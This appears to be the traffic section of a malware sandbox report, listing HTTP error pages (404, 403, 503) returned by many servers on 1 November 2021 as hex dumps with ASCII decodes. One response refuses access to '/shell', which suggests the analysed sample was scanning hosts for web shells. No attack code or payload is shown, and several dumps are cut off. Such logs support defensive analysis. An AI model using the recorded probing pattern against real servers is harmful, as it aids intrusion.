Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:01 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcontent-length: 86cache-control: no-cacheData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><body><h1>404 Not Found</h1>The requested URL was not found.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:07 GMTContent-Length: 1238Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:09 GMTServer: LiteSpeedData Raw: 32 37 36 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:09 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:10 GMTServer: LiteSpeedData Raw: 32 37 35 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:10 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 